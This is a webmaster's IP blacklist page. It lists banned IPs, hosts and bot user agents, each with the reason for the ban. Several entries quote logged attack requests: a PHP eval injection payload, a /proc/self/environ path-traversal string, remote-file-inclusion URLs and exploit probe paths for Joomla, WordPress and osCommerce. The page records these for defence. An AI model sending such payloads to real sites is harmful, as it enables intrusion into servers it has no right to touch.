IP Blacklist


List of Banned IPs, Hosts, and Domains

Also see the list of
Banned IP Ranges

The IP’s, Hosts and Domains listed in this table are banned universally from accessing any of my own websites, and most of my clients sites. Some form of bad activity has been seen from the addresses listed.

Bad activity includes; unwanted spiders, rule breakers, comment spammers, trackback spammers, spambots, hacker bots, registration bots and other scripting attackers, harvesters, nuisance spiders, spy bots and organisations spying on websites for commercial reasons.

DISCLAIMER
Please note: being listed on this page does not necessarily mean an IP address, domain name, or any other information is owned by a spammer or hacker. It may have been hijacked from its true owner and used by a spammer or hacker.
IP (Single or Range) Host ID, Company and/or User Agent Reason for Ban
192.167.33.200 Italy Napoli Universita’ Degli Studi Di Napoli Federico Ii Looking for uploadify exploit, mail server
5.101.100.60 Netherlands Amsterdam Digital Ocean Inc. Banned user agent: Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
130.185.139.213 Denmark Copenhagen Nianet A/s Banned user agent: Riddler (http: //riddler.io/about)
50.203.216.14 United States Bellevue Comcast Cable Communications Holdings Inc Banned user agent: Mozilla/5.0 (compatible; GroupHigh/1.0; +http: //www.grouphigh.com/)
74.15.163.71 Canada Toronto Sympatico Hse Web server
64.150.191.134 United States Overland Park Codero Web server
75.49.158.157 United States Dallas AT&T Internet Services Suspicious user agent – Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; abot v1.2.3.1 http: //code.google.com/p/abot)
212.224.119.178 Germany Frankfurt Am Main First Colo Gmbh Bad bot: Mozilla/5.0 (compatible; XoviBot/2.0; +http://www.xovibot.net/)
69.50.234.132 United States San Jose Nephoscale Inc. MixRankBot – Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com). Does not get robots.txt, found honeypot trap file
202.70.136.15 Indonesia Jakarta Departemen Kesehatan Dictionary attacker
217.79.184.51 Germany Kevelaer Computer Andris Kevelaer Banned bot: Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http: //www.majestic12.co.uk/bot.php?+)
212.110.177.137 United Kingdom York Bytemark Computer Consulting Ltd Web hosting server
72.163.217.105 United States San Jose Cisco Systems Inc. Forbidden user agent: curl/7.12.1 (x86_64-redhat-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.7a zlib/1.2.1.2 libidn/0.5.6
50.196.253.34 United States Chicago 2 Asian Brothers Web server
65.129.124.104 United States Boise Qwest Communications Company Llc Comment spammer
98.174.25.29 United States Dallas Cox Communications Inc. Scanning for wp-admin
71.7.190.98 Canada Halifax Eastlink Hsi Scanning for wp-admin
128.30.52.70 United States Cambridge Massachusetts Institute Of Technology W3C_Validator/1.3 http: //validator.w3.org/services
209.191.189.242 United States Bremerton Network Redux Llc Banned bot – BlogSearch/2 +http: //www.icerocket.com/
213.165.190.114 Malta San Giljan Melita Plc Mail/web server
66.135.34.113 United States San Antonio Serverbeach (Peer 1 Network (USA) Inc.,US) Hacker activity
46.29.18.88 Poland Olsztyn Sprint S.a. Spammer
195.122.153.127 United Kingdom London Red-sky Lan Forbiden user agent: python-requests/2.3.0 CPython/2.7.3 Linux/3.14-0.bpo.1-amd64
180.151.36.182 India Bangalore Citycom Networks Pvt Ltd Mail server, dictionary attacker
70.39.246.37 United States Herndon Rhythmic Technologies Inc. Commercial content scraper
95.131.234.7 Malta Valletta Bellnet Vps Services Unidentified bot (no user agent declared) crawled site
203.193.166.228 India Bangalore Software Technology Parks Of India Spammer, web server
76.11.5.114 Canada Halifax Eastlink Unidentified bot tried to crawl site – no user agent declared
46.165.212.110 Germany Frankfurt Am Main Leaseweb Germany Gmbh Spam harvester. mail server
77.166.157.92 Netherlands Amersfoort Koninklijke Kpn N.v. Owlin Bot – feed harvester and rule breaker. Never gets robot.txt
94.228.220.68 Netherlands Amsterdam Netrouting Telecom Hacker activity, no user agent
216.170.115.218 United States Los Angeles Cheapwindowsvps.com Forbidden user agent – Xenu Link Sleuth/1.3.8
69.84.207.246 United States Bakersfield Lightspeed Technologies Bot – LSSRocketCrawler/1.0 LightspeedSystems
198.170.241.46 United States Sterling Ntt America Inc. Looking for /old/wp-admin/, no user agent declared
74.82.40.2 United States San Jose Hurricane Electric Inc. Looking for /wp/wp-admin/, no user agent declared
84.232.217.42 Romania Bucharest Rcs & Rds Residential web server hosting 1 site – tehnicadmin.tk
46.117.48.28 Israel Tel Aviv Nv Bb (NetVision Ltd.,IL) Dictionary attacker
62.108.187.131 Poland Koszalin Technical University Of Koszalin Looking for OsCommerce/ZenCart exploit
204.12.217.210 United States Kansas City Will Divens (WholeSale Internet, Inc.,US) Web server, spammer
89.145.116.4 United Kingdom London Network Eq Ltd Ipv4 Assignment Web server, attempted Joomla JCE editor exploit
31.186.174.155 Netherlands Dronten Totaaldomein Bv Hacker activity – attempting PHP shell exploit – looking for /wso.php
92.60.114.51 United Kingdom Derby Webfusion Internet Solutions Hacker activity – attempting PHP shell exploit – looking for /wso.php
95.92.33.60 Portugal Lisbon Tvcabo Portugal S.a. web server, spammer
77.241.93.168 Belgium Gent Combell Group Nv web server, spammer
79.44.13.245 Italy Milano Nas Dhcp Pool Trieste (Telecom Italia S.p.a.,IT) Dictionary attacker
69.30.243.122 United States Kansas City Nick Koronzo Forbidden user agent – curl/7.21.0 (x86_64-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6
78.7.44.22 Italy Roma Arch. Salme Dante Dictionary attacker
194.153.113.7 Germany Kassel Ibm Deutschland Gmbh Bad bot – Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/) – rule breaker
208.90.57.196 United States San Jose Cisco Systems Ironport Division Falsely identified web spider
74.213.162.153 Canada Toronto Frontline Hosting Corporation Dictionary atacker, web server
46.36.39.9 Czech Republic Prague Gtt A.s. Forbidden request – /xmlrpc.php, forbidden user agent: PycURL/7.29.0
209.249.5.249 United States Los Angeles Abovenet Communications Inc rogerbot/1.0 (http: //moz.com/help/pro/what-is-rogerbot-, rogerbot-wherecat@moz.com)
70.194.79.229 United States Marseilles Verizon Wireless Dictionary attacker
157.14.187.247 Japan Tokyo Marubeni Access Solutions Inc. Dictionary attacker
198.1.99.213 United States Provo Unified Layer Unidentified bot trying to crawl site. Missing user agent ID. Web server IP, hostname: galaxy.hostdatasecure.com
92.103.79.51 France Paris Montrouge (COMPLETEL SAS France) bot with user agent “mozilla opera”
46.37.6.147 Italy Arezzo Aruba S.p.a. Web hosting server
208.94.232.182 United States South Lake Tahoe Wz Communications Inc. Bad GET request – /wp-content/plugins/mingle-forum/feed.php?topic=all. User Agent: FeedlyBot/1.0 (http: //feedly.com)
94.102.56.236 Netherlands Amsterdam Ecatel Ltd Prolific comment spammer
67.253.117.45 United States Old Town Time Warner Cable Internet Llc Rule breaker bot – ProTech Marketing LLC Spider/v.0.1 (+http://protechmarketingllc.com)
64.22.138.9 United States Pasadena Host Collective Inc. Web server
151.225.91.0 United Kingdom London Sky Broadband Spammer
156.54.59.153 Italy Roma Telecom Italia S.p.a. (Telecomitalia s.p.a.,IT) scanning for uploadify exploit vulnerability
68.193.203.185 United States Ossining Optimum Online spammer/hacker
67.160.99.226 United States Bellevue Comcast Cable Communications Inc Web server – 9 websites hosted
217.115.112.107 Ireland Dublin Sternforth Limited T/a Web World Web server hosting 55 websites
37.16.72.210 France Montreuil Internet Memory Research S.a.s. (Hurricane Electric, Inc.,US) Banned user agent: Mozilla/5.0 (compatible; memoryBot/1.21.14 +http: //mignify.com/bot.html)
80.109.18.233 Austria Vienna Upc Telekabel (Liberty Global Operations B.V.,AT) Web server
50.47.56.138 United States Seattle Frontier Communications Of America Inc. Web server
14.102.97.216 India Delhi World Phone Internet Services Pvt Ltd Spammer
46.193.165.244 France Paris Wifirst S.a.s Comment spammer
192.255.71.137 United States Albany Micfo Llc. Comment spammer
83.170.105.135 United Kingdom London Uk2 – Ltd Web server
80.254.147.236 United Kingdom London Scansafe Lon Banned for spoofing IP
46.29.125.14 France Villeneuve Avenir Telematique S.a.s. Comment spammer
89.110.144.217 Germany Montabaur Netclusive Gmbh Web server IP
213.206.112.80 Netherlands Amsterdam Widexs B.v. Web server/mail server IP
82.39.176.35 United Kingdom Springfield Basildon (Virgin Media Limited,GB) ersisitent attempts to login to WordPress admin
134.255.230.21 Germany Verden Virtual Services 4 You (Dennis Rainer Warnholz,DE) Web server IP
212.152.181.222 Norway Sandnes Jakob Hatteland Solutions As Web server, probing for wp-admin
184.107.197.82 Canada Montreal Qc Media (iWeb Technologies Inc.,CA) Web server
67.59.182.170 United States Newark Hostmysite Web server
77.68.246.90 Denmark Aalborg Bredbaand Nord A/s Web server
81.28.95.125 Netherlands Woerden Redhosting B.v. Web server, dictionary attacker
85.13.144.228 Germany Friedersdorf Neue Medien Muennich Gmbh Web server – dd25732.kasserver.com
82.165.133.103 United States Chesterbrook 1&1 Internet Ag Web server, s16635692.onlinehome-server.info
154.69.121.230 South Africa Pretoria Telkom Sa Ltd Some sort of spider with user agent Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 GTB7.1 ( .NET CLR 3.5.30729; .NET4.0E)
192.71.55.226 Sweden Stockholm Internetbolaget Hosting In France Faking Googlebot: User agent – Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
196.36.32.147 South Africa Randburg The Internet Solution (pty) Ltd Web server – shared by 27 sites
195.200.78.252 France Ecully Informatique On Line Sarl Web server – shared by 29 sites
64.111.26.36 United States Colorado Springs Data 102 Llc Web server
209.44.124.120 Netelligent Hosting Services Inc (Canada Laval Citeglobe) Web server
217.41.0.94 United Kingdom Hillingdon Single Static Ip Addresses Web server
155.133.19.235 Poland Olsztyn Delorian Internet Services Spam registration atttempt
199.19.249.196 United Kingdom London Blue Coat Systems Inc Spam registration atttempt
212.90.148.93 Germany Minden Goneo Internet Gmbh Spam registration atttempt
94.102.56.239 Netherlands Amsterdam Ecatel Ltd Spammer
200.185.235.183 Host: Brazil Sao Paulo Vivo S.a. Faking Googlebot user agent
200.215.14.114 Host: Brasilia Brasil Telecom S/a – Filial Distrito Federal Faking Googlebot user agent
79.169.153.52 Host: Portugal Lisbon Tvcabo Portugal S.a. (Autonomous System,PT) Faking Googlebot user agent
128.204.196.150 Host: Netherlands Amsterdam Snel.com B.v Trying to register on closed site
213.188.134.29 Host: Norway Oslo Active 24 As Looking for Joomla JCE exploit:
1) /images/stories/food.php
2) //images/stories/vito.php
193.136.230.22 Host: Portugal Coimbra Fundacao Para A Ciencia E A Tecnologia I.p. Hacker looking for OpenFlashChart exploit in WordPress SEO Watcher plugin
23.253.73.231 Host: United States Canton Rackspace Cloud Servers
Web server: 1 website – cranecams.com
Hacker / bot attempting PHP eval exploit
/?page=data:,%3C?php%20eval($_GET[a]);%20?%3E&dir=data:,%3C?php%20eval($_GET[a]);%20?%3E&file=data:,%3C?php%20eval($_GET[a]);%20?%3E&asc=data:,%3C?php%20eval($_GET[a]);%20?%3E&inc=data:, PLUS LOTS MORE
41.138.59.21 Hostname: nomade.sahelcom.ne
Host: Niger – Niamey Societe Nigerienne Des Telecommunications
Web server: 1 website – sahelcom.ne
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/barner.gif
72.38.78.210 Hostname: s72-38-78-210.static.comm.cgocable.net
Host: Canada – Burlington Cogeco Cable Inc.
Web server: 2 websites – naturalchoicecleaning.ca, naturalchoicecleaning.com
Hacker attempting web injection attack
/admin/admin.php?view=admin&do=../../../../../../../../../../../../../../../proc/self/environ%00
User agent: libwww-perl/5.805
69.11.119.3 Hostname: 69-11-119-3.sktn.static.sasknet.sk.ca
Host: Canada – Saskatoon Sasktel Wide Area Network Engineering Center
Hacker attempting web injection attack
/admin/admin.php?view=admin&do=../../../../../../../../../../../../../../../proc/self/environ%00
User agent: libwww-perl/5.65
202.29.233.243 Hostname: rh06.hostreflex.com
Host: Thailand – Nakhon Si Thammarat Uninet
Web server: 1 website – kptc.ac.th
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /content/images/stories/food.php?rf
204.188.197.130 Hostname: rh06.hostreflex.com
Host: United States – Bethel Park Sharktech
Web server: 1 website – bbs-hiboux.fr
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
69.36.4.145 Hostname: rh06.hostreflex.com
Host: United States – New York City Jtl Networks Inc.
Web server: 11 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.235.180.220 Hostname: ns.domainhosted.com
Host: United States – Rio Linda Hopone Internet Corporation
Web server: 121 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /content/images/stories/food.php?rf
77.109.141.138 Hostname: spftor1e1.privacyfoundation.ch
Host: Netherlands – Amsterdam Init Seven Ag
Comment spammer
88.191.153.199 Hostname: 88-191-153-199.rev.dedibox.fr
Host: France – Lyon Dedibox Sas
Comment spammer
89.145.95.2 Hostname: centro-2.grapeshot.co.uk
Host: United Kingdom – London Grapeshot Ltd
GrapeshotCrawler:
Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php
Mozilla/5.0 (compatible; grapeFX/0.9; crawler@grapeshot.co.uk) libwww/5.4.1
lwp-request/2.07
144.76.78.196 Hostname: static.196.78.76.144.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
uMBot:
User agent: Mozilla/5.0 (compatible; uMBot-LN/1.0; mailto:
crawling@ubermetrics-technologies.com)
27.255.84.219 Host: Korea, Republic Of – Seoul Ehostidc Brute force dictionary attack on WordPress admin login
208.65.156.45 Hostname: mac1.melodystreet.com
Host: United States – Las Vegas Arogo.net
Web server: 3 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/Pagat.php?rf
199.192.73.75 Host: United States – San Francisco Jonathan Liu Some sort of badly configured bot adding #main-content to and of every URL
Probably not malicious.
91.142.220.31 Hostname: wirelessgalicia1.vservers.es
Host: Spain – Malaga Axarnet Comunicaciones Sl
Web server: 43 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
49.50.8.92 Hostname: ip-50-8-92.masterweb.net
Host: Indonesia – Jakarta Pt Master Web Network
Web server: 169 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
95.222.77.95 Hostname: ip-95-222-77-95.unitymediagroup.de
Host: Germany – Kerpen Unitymedia Nrw Gmbh
Hit site several hundred times in 5 minutes looking for /user/
Some kind of badly scripted bot
User agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Came back with dictionary attack on site admi
80.190.157.7 Hostname: srv235.faber-network.net
Host: Germany – Nuremberg Faber Network Gmbh
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
82.165.131.205 Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – sulopdfacil.com
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
109.237.81.62 Host: Ukraine – Kiev T.e.s.t. Ltd
Web server: 8 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
93.185.106.78 Host: Czech Republic – Prague Vshosting S.r.o.
Web server: 15 websites
Hacker bot looking for Joomla OpenFlashChart exploit:
//administrator/components/com_jinc/classes/graphics/tmp-upload-images/lobex21.php?rf
Known hacker botnet user agent: 1) BOT/0.1 (BOT for JCE)
Malicious user agent: libwww-perl/5.837
81.169.212.237 Hostname: h2225003.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 16 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
50.63.85.209 Hostname: ip-50-63-85-209.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 7 websites
Hacker botnet – Dictionary attack on WordPress admin
64.31.25.60 Hostname: 60-25-31-64.static.reverse.lstn.net
Host: United States – Dallas Limestone Networks Inc.
Hacker botnet – Dictionary attack on WordPress admin
188.121.62.249 Hostname: ip-188-121-62-249.ip.secureserver.net
Host: Netherlands – Amsterdam Go Daddy Netherlands B.v.
Web server: 7 websites
Hacker botnet – Dictionary attack on WordPress admin
62.212.130.150 Hostname: srv1.deleukstewinkelsvan.nl
Host: Netherlands – Amsterdam Xenosite B.v.
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
69.64.65.10 Hostname: 69-64-65-10.dedicated.codero.net
Host: United States – Newport Codero
Web server: 2 websites
Hacker botnet – Dictionary attack on WordPress admin
192.80.146.132 Hostname: sb1.10gen.cc
Host: United States – Los Angeles Enzu Inc
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
64.34.173.227 Hostname: sb1.10gen.cc
Host: United States – Pacifica Serverbeach
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
208.113.148.48 Hostname: ps126341.dreamhost.com
Host: United States – Brea New Dream Network Llc
Web server: 19 websites
Hacker botnet – Dictionary attack on WordPress admin
94.120.123.163 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Hacker – Dictionary attack on WordPress admin
112.78.112.235 Hostname: www1895.sakura.ne.jp
Host: Japan – Tokyo Sakura Internet Inc.
Web server: 190 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
108.174.49.212 Hostname: host.colocrossing.com
Host: United States – Chicago Colocrossing
Spammer / spam bot
User Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
46.32.250.86 Hostname: ds-87151.ds-10.com
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 9 websites
Unidentified bot – no user agent
Bad GET requests incl:
/wp-login.php
/administrator/index.php
173.236.42.34 Hostname: host32.server2.vpn999.com
Host: United States – Chicago Singlehop Inc.
Web server: 5 websites
Spammer
49.50.8.21 Hostname: ip-50-8-21.masterweb.net
Host: Indonesia – Jakarta Pt Master Web Network
Web server: 139 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/bonek.php?rf
216.194.8.46 Hostname: 216-194-8-46.ny.ny.metconnect.net
Host: United States – Brooklyn Mettel Inc.
Web server: 17 websites
Hacker botnet – Dictionary attack on WordPress admin
50.63.141.164 Hostname: ip-50-63-141-164.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 2 websites
Hacker botnet – Dictionary attack on WordPress admin
64.62.191.199 Host: United States – Fremont Hurricane Electric Inc.
Web server: 15 websites
Hacker botnet – Dictionary attack on WordPress admin
207.182.143.114 Hostname: 72.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
Banned bot: niki-bot
Web scraper, rule breaker
205.237.206.226 Hostname: mdv-206-226.dotnt.com
Host: United States – South Portland Ethernext Inc.
Web server: 10 websites
Hacker – looking for multiple exploits.
DoS type attacker – hit site around 3000 times in 15 minutes
Examples:
/w-agora_path/reorder_forums.php
/wapchat/src/eng.adCreate.php
/vwebmail/includes/mailaccess/pop3/core.php
/vp/configure.php
/web/Administration/Includes/configureText.php
/wbxml/WBXML/Decoder.php
MANY MORE
106.187.47.170 Hostname: ebismacau.com
Host: Japan – Tokyo Linode Llc
Web server: 4 websites
Hacker botnet – Dictionary attack on WordPress admin
103.6.237.67 Host: Malaysia – Seri Kembangan Block 1 Mtdc Server Farm Complex
Web server: 11 websites
Hacker botnet – Dictionary attack on WordPress admin
63.245.169.229 Hostname: 63-245-169-229.ip.lrmutual.com
Host: United States – Little River Mutual Telephone Company
Web server: 1 website – usd444.com
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
87.106.177.97 Hostname: s16586209.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 28 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.20.222.39 Host: Azerbaijan Baku Delta Telecom Ltd Hacker – Dictionary attack on WordPress admin
93.180.68.68 Hostname: firewall.vhosting.pcextreme.nl
Host: Netherlands – Middelburg Pcextreme B.v. (Appears this IP is actually Bulgaria)
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/thesis_185/lib/scripts/thumb.php?src=http: //picasa.com.lichti.ca/bat.php
188.40.69.204 Hostname: server.dietpatch4u.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 16 websites
Comment spammer – Spam bot
91.230.195.208 Hostname: reverse-91-230-195-208.icnhost.net
Host: Bulgaria – Internet Corporated Networks Ltd
Web server: 10 websites
Hacker – looking for admin exploits
/wp-login.php
/administrator/index.php
66.147.244.110 Hostname: box810.bluehost.com
Host: United States – Provo Unified Layer
Web server: 3653 websites
Hacker – looking for vulnerable WordPress plugins
85.214.33.181 Hostname: h2229297.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 3 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
137.110.244.139 Hostname: integromedb-crawler.integromedb.org
Host: United States – San Diego University Of California San Diego
Banned bot: www .integromedb.org/Crawler
209.252.31.244 Hostname: 209-252-31-244.ip.mcleodusa.net
Host: United States – Fairport Paetec Communications Inc.
Web server: 1 website – eclipsemold.com
Bad GET request
/articles”class=”url”data-dot=”url”>graphicline.co.za/articles/a>/div>/div>/div>script>JAK.Fulltext.ResultScreenshotResize(“
187.33.253.23 Hostname: reverso.23.reverso.com
Host: Brazil – Joao Pessoa Sitecnet Informatica Ltda
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
96.43.128.2 Host: United States – Kansas City Joe’s Datacenter Llc
Web server: 1 website – actuallyforsale.com
Suspicious user agent: Ruby
84.99.35.51 Hostname: 51.35.99.84.rev.sfr.net
Host: France – Paris Societe Francaise Du Radiotelephone S.a.
Scraper bot
Malicious user agent: Java/1.6.0_25
46.105.103.66 Hostname: server1.cnetweb.co.uk
Host: France – Roubaix Ovh Systems
Web server: 63 websites
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?CONFIG[MWCHAT_Libs]=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http://www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4} /index.php?ConfigDir=http: //www.google.com/humans.txt?
6) /modules/Forums/admin/admin_styles.php?phpbb_root_path=http: //www.google.com/humans.txt?
7) /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http: //www.google.com/humans.txt?
8) /inhalt.php?dateien[news]=http: //www.google.com/humans.txt?
9) /index.php?AML_opensite=http: //www.google.com/humans.txt?
10) /NuclearBB/tasks/send_queued_emails.php?root_path=http: //www.google.com/humans.txt?
Many others
No user agent
137.110.244.137 Host: United States – San Diego University Of California San Diego
Web server: 3 websites – biologicalnetworks.net biologicalnetworks.org integromedb.org
Banned bot: www .integromedb.org/Crawler
119.31.234.193 Hostname: server.strivesolutions.biz
Host: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Web server: 87 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
85.214.205.155 Hostname: server12.rz.jubatus.de
Host: Germany – Berlin Strato Ag
Web server: 118 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
78.158.11.226 Hostname: cl-78-158-11-226.fastlink.lt
Host: Lithuania – Vilnius Uab Consilium Optimum
Banned bot: Lynx/2.8.5rel.1 libwww-FM/2.15FC SSL-MM/1.4.1c OpenSSL/0.9.7e-dev
93.51.142.19 Host: Italy – Milano Next Step Soluzioni Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
85.214.140.220 Hostname: h1791140.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 76 websites
Hacker bot looking for Joomla JCE exploit:
Example:
1) //images/stories/explore.gif
162.72.248.149 Host: United States – Englewood Viasat Communications Inc. Some sort of bot trawling for images
Doesn’t identify itself as a bot
78.46.79.195 Host: Germany – Nuremberg Hetzner Online Ag
Web server: 58 websites
Hacker bot scanning for Open Flash Chart exploits
//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf
Malicious and known hacker botnet user agents:
1) libwww-perl/5.805
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
97.79.238.33 Hostname: gvo23833.gvodatacenter.com
Host: United States – Concord Time Warner Cable Internet Llc
Web server: 628 websites
Hacker bot looking for Joomla JCE exploit:
